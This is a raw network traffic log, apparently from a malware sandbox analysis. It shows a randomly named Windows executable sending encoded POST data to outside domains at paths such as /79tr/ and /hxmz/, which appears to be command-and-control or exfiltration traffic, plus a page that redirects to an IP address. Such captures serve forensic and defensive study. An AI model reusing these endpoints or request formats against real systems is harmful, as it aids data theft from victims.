Nov 15, 2024 04:21:34.367914915 CET	835	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 15 Nov 2024 03:21:34 GMT Content-Type: text/html Content-Length: 609 Last-Modified: Wed, 13 Nov 2024 08:19:25 GMT Connection: close ETag: "6734610d-261" Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 37 34 66 38 32 66 63 36 35 39 65 35 61 63 64 38 61 39 35 38 62 62 66 38 39 30 34 31 64 31 66 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 [TRUNCATED] Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?874f82fc659e5acd8a958bbf89041d1f"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817/register'; }, 1000); // 1 }; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:21:49.631073952 CET	826	OUT	POST /79tr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.beingandbecoming.ltd Referer: http://www.beingandbecoming.ltd/79tr/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 71 47 4b 5a 4b 53 74 6b 71 6a 68 36 52 4e 4b 2f 4f 62 79 5a 37 64 33 69 65 6d 4f 63 55 73 6e 6b 77 3d 3d Data Ascii: R4qXin=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWqGKZKStkqjh6RNK/ObyZ7d3iemOcUsnkw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49756	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:21:52.175410986 CET	846	OUT	POST /79tr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.beingandbecoming.ltd Referer: http://www.beingandbecoming.ltd/79tr/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 35 45 2f 5a 76 36 52 58 52 75 2f 31 72 39 54 57 50 2f 7a 50 6e 51 44 33 48 43 5a 44 7a 73 55 35 34 3d Data Ascii: R4qXin=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL75E/Zv6RXRu/1r9TWP/zPnQD3HCZDzsU54=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49771	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:21:54.723742008 CET	10928	OUT	POST /79tr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.beingandbecoming.ltd Referer: http://www.beingandbecoming.ltd/79tr/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 71 42 7a 67 52 7a 71 2b 65 76 49 71 6c 59 68 72 33 45 49 32 42 37 7a 6a 4c 36 66 44 76 67 70 38 37 72 4f 57 6d 63 4a 6d 6a 54 44 66 2f 4f 79 4c 6e 4d 65 31 33 4c 68 32 74 32 47 74 5a 63 61 70 4d 56 35 7a 30 73 49 6a 63 53 30 6e 45 44 34 53 6b 42 59 49 62 6b 38 65 55 66 4a 39 77 77 72 46 4d 5a 38 61 47 61 51 36 6f 37 42 79 6b 67 2b 4d 74 6b 6d 53 71 4c 2b 6b 31 2b 4f 44 52 2b 43 53 4f 67 76 76 71 48 58 57 4c 69 2b 70 71 36 39 50 56 73 44 2f 74 48 73 33 6d 62 70 41 39 59 43 65 4b [TRUNCATED] Data Ascii: R4qXin=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbSCfu+ByZsAHz1ho6Cdc48IJdL9cuUsDi+LUf0RQPJFKkR9JOCJuKYCNBkmiM7n24eMR7MS7rGBOGncPLc/2s855lDJ3On0w0z5yQqQc8dUeOiRREuAQGmkNULDlSZKJupqBzgRzq+evIqlYhr3EI2B7zjL6fDvgp87rOWmcJmjTDf/OyLnMe13Lh2t2GtZcapMV5z0sIjcS0nED4SkBYIbk8eUfJ9wwrFMZ8aGaQ6o7Bykg+MtkmSqL+k1+ODR+CSOgvvqHXWLi+pq69PVsD/tHs3mbpA9YCeKOr+qU5SRTUqofRc/uBxZgyybUf6E4V/aHG5QbsIu9YaK99lyu0CKm7uASLa7LDeiW/RYhRYFz3JRXCiTj9Ef6aP/71BaHIzNBaBV2ArDLuyrT3JwbxIMi3UAFntiIkGRf3jybTxc7/3HTg6kfj65W15qsQMZrR8ceoksUx3a3RuQ5boWDCvnIi8q1WGhsFJXyyzz0UIVWLOoJhbBusdzqmeu22TdZ1p+8MP19aiAI+RcfITlzHu611Ud6T1oxElPqRFmkG/XKFjHxlqtiq0+FRFGsLMIBcL+GG9rG/6ewoUJU3MJ+43eGJow46P5oyeYHS24dHl31xclUA0+N4JFhm32VCPb4buPiJvi/CpwAmrYPEQdauGMh7u+YDOHqGQCxoET3td8/kjPGai2//RasEWvKIHJx2bdU2jL4gCNmW1gPneYqmmswoxq/V9BD/dpMd6EInt7KL3ld8zUjwrnFgRLBGLKWG8lXUPgQ7vlcTJFtx/dp5dqSe0EeOj8/+MuAWTWP5i74FZPo+KtSQMNHgnO1ikhZuzlc7h1v/2beX4AwRAePu0CN+3tDCb1kIFIZeyOw4+cTL0CIvyYyYjnNVdagEWS22m1QZdWwRnbF46wXRJ0E9xbNEVY39Nkv93F6BvIeZpEjI/kavKKB4rWPq1utiGZv0K8oD [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49786	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:21:57.262408972 CET	550	OUT	GET /79tr/?R4qXin=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&A69pk=_b0Tr07p9f0pn HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:21:58.935957909 CET	402	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 15 Nov 2024 03:21:58 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 34 71 58 69 6e 3d 76 42 34 30 31 36 72 77 66 48 30 4d 78 74 61 33 57 48 7a 38 66 48 61 49 56 49 52 61 37 6a 50 6e 65 38 75 68 2b 6d 6e 6f 48 52 65 57 6c 6f 4e 6d 4d 37 64 70 34 46 67 72 36 77 74 4b 37 50 74 63 57 74 4e 76 73 45 30 43 70 74 33 74 51 57 74 56 51 72 5a 50 38 41 45 2f 4d 7a 41 4e 55 4b 76 4d 56 6b 4f 71 4b 37 76 43 79 38 59 72 34 62 6a 32 71 6d 4d 48 4c 6b 51 3d 26 41 36 39 70 6b 3d 5f 62 30 54 72 30 37 70 39 66 30 70 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R4qXin=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&A69pk=_b0Tr07p9f0pn"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49801	203.161.49.193	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:04.444076061 CET	817	OUT	POST /hxmz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.futurevision.life Referer: http://www.futurevision.life/hxmz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 45 72 38 6d 38 70 61 42 53 33 46 2f 62 66 6c 69 34 63 2f 4b 72 41 75 39 66 72 51 63 42 70 71 4c 5a 56 4b 58 6d 46 6b 73 57 42 6a 45 42 7a 49 73 7a 2f 52 67 71 47 6c 36 76 6e 4f 77 65 48 33 49 4e 45 45 4d 5a 45 72 63 75 64 51 72 64 4e 72 39 35 53 69 4c 78 43 34 73 58 6b 65 6c 64 51 6f 46 34 38 39 2f 58 6f 54 63 70 79 42 4d 76 61 43 64 51 56 35 4d 6e 72 48 4d 62 6f 47 61 67 73 55 6f 61 39 35 37 53 39 48 65 70 76 52 74 63 68 73 79 51 56 4e 4c 52 57 42 31 35 55 47 71 59 41 6e 6a 6d 6e 66 45 31 2b 4d 71 61 43 4d 52 36 30 41 4c 74 35 52 43 65 51 3d 3d Data Ascii: R4qXin=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRWB15UGqYAnjmnfE1+MqaCMR60ALt5RCeQ==
Nov 15, 2024 04:22:05.113562107 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 15 Nov 2024 03:22:05 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49802	203.161.49.193	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:06.987802029 CET	837	OUT	POST /hxmz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.futurevision.life Referer: http://www.futurevision.life/hxmz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 36 4c 65 78 61 58 6e 45 6b 73 52 42 6a 45 4b 54 49 70 33 2f 52 76 71 47 70 79 76 6b 57 77 65 48 6a 49 4e 41 55 4d 59 7a 2f 66 38 64 51 70 57 74 72 2f 32 79 69 4c 78 43 34 73 58 6b 61 50 64 51 77 46 37 4e 4e 2f 56 4a 54 64 6b 53 42 54 6f 61 43 64 42 46 34 4c 6e 72 48 4c 62 74 65 30 67 71 59 6f 61 34 64 37 54 6f 7a 66 6a 76 52 6a 54 42 74 32 44 57 6f 31 4a 57 49 5a 79 53 65 50 54 77 58 37 71 42 53 65 6b 50 74 39 49 43 6f 69 6e 7a 4a 2f 67 36 73 4c 46 62 51 6c 59 33 4b 42 73 73 53 70 64 79 69 4c 66 2b 2f 71 2b 70 51 3d Data Ascii: R4qXin=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICoinzJ/g6sLFbQlY3KBssSpdyiLf+/q+pQ=
Nov 15, 2024 04:22:07.646389008 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 15 Nov 2024 03:22:07 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49803	203.161.49.193	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:09.527503014 CET	10919	OUT	POST /hxmz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.futurevision.life Referer: http://www.futurevision.life/hxmz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 79 4c 65 47 79 58 6d 6a 34 73 51 42 6a 45 4a 54 49 6f 33 2f 52 32 71 47 68 32 76 6a 65 47 65 42 76 49 4e 69 63 4d 66 47 44 66 32 64 51 70 4c 39 72 2b 35 53 69 65 78 43 6f 67 58 6b 4b 50 64 51 77 46 37 4f 56 2f 53 59 54 64 6d 53 42 4d 76 61 43 76 51 56 34 76 6e 76 72 39 62 74 54 42 67 61 34 6f 61 65 39 37 65 2b 66 66 76 76 52 32 51 42 74 51 44 57 55 51 4a 57 55 6a 79 53 43 78 54 7a 4c 37 70 6b 4b 49 77 66 31 6d 64 44 68 77 6b 51 55 55 6a 34 49 6f 41 71 67 6d 58 56 54 62 31 4f 58 4b 5a 42 48 55 45 73 6a 33 73 2b 4f 47 35 32 31 71 4d 7a 62 58 71 5a 33 43 57 63 42 48 49 6b 75 6e 73 6e 66 6e 62 5a 78 52 6a 4f 59 67 68 6d 6d 31 52 5a 39 77 38 6b 6f 52 6d 45 4e 51 59 77 68 45 74 43 55 30 30 45 64 77 30 34 48 47 35 72 39 42 66 4e 37 74 4e 73 38 66 38 6a 67 59 6e 32 30 6f 50 37 34 4e 6c 78 39 77 4c 47 41 35 45 65 30 44 59 46 4d 79 52 38 6c 57 7a 57 58 2f 6a 47 55 [TRUNCATED] Data Ascii: R4qXin=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/yLeGyXmj4sQBjEJTIo3/R2qGh2vjeGeBvINicMfGDf2dQpL9r+5SiexCogXkKPdQwF7OV/SYTdmSBMvaCvQV4vnvr9btTBga4oae97e+ffvvR2QBtQDWUQJWUjySCxTzL7pkKIwf1mdDhwkQUUj4IoAqgmXVTb1OXKZBHUEsj3s+OG521qMzbXqZ3CWcBHIkunsnfnbZxRjOYghmm1RZ9w8koRmENQYwhEtCU00Edw04HG5r9BfN7tNs8f8jgYn20oP74Nlx9wLGA5Ee0DYFMyR8lWzWX/jGUmLHEiJnOq1XO0Lm5IMfIGlJiHWXBuMNEty6S8KUOXVqOtR0cWBXMkQNVHRelIf4gqO83fhO6q7m+2YuMqI/QpmziHqHosEICZZUiP6Q+fiPvAcCEQ/hDHWxopKz3Re6qCUNBZFEQ74Ybtu6grRgWEeiUT7OTqTSKpXXjDrQPxOjv0zVhhD4pI3YoModpcnGyBtjBDOQ7mw+26Rlt0bqiBh0Yus195lhYtNuzQf6SKXwVU0rpDjlMLibBgqW7AvlKhOxv8gRdjuSPgmS7rK1AP9hVxTzRCBIDpP5nC5ye1ScHnOBGDQkOQVC85y1dM/OTHRndJ54PlAz4f4sPLmSM1YGvoW9wxz9lQVdwGYk8UgKqX98E9FOLSLsJHud5AU7FLtrYRPQaF7+C7p2ep10F9nNiZnZMHQ1JnjmWqYaedDbcw+UFBfL1woxWJcyugq4ePnLxEEo5jxXeWlY8jOTAavWG/c0VJOxLT3lOjuqH6OonhPDTRHachL96tFA5IgEskVlky+nXMwtnr5oA7IQEaQ9KwyT2USUHulevX79EFzQ1UFzZSDwZnNcohC/PJO+CUW2yKYe3mY5pgZEJOP5kiYbKbEyJji3h9sh72dHv7HbGlCM2U0O5kkPaMEFh/OrNG1urDCn4I/E+l3RADQzmOVqtgyjqQH5UD4 [TRUNCATED]
Nov 15, 2024 04:22:10.212743998 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 15 Nov 2024 03:22:10 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 